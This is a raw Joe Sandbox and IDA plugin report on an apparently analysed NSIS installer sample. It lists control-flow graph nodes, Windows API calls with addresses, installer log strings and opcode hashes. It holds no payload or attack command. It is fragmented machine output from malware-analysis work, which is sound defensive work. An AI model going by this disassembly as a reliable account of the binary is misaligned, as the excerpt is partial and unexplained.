18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 
4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 
4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 
FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 
4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

Control-flow Graph (legend: Executed, Not Executed)
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                  • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                  • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                  • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                  • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                  • GetTempPathW.KERNELBASE(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                  • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                  • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                  • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 825 406301-406315 FindFirstFileW 826 406322 825->826 827 406317-406320 FindClose 825->827 828 406324-406325 826->828 827->828
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                  • String ID: jF
                                                                                                                                                                                                                                                                  • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                  • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                  • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 310444273-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                  • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                  • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                  • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                  • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                  • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                  • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                  • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                  • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                  • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                  • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                  • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 004057A0
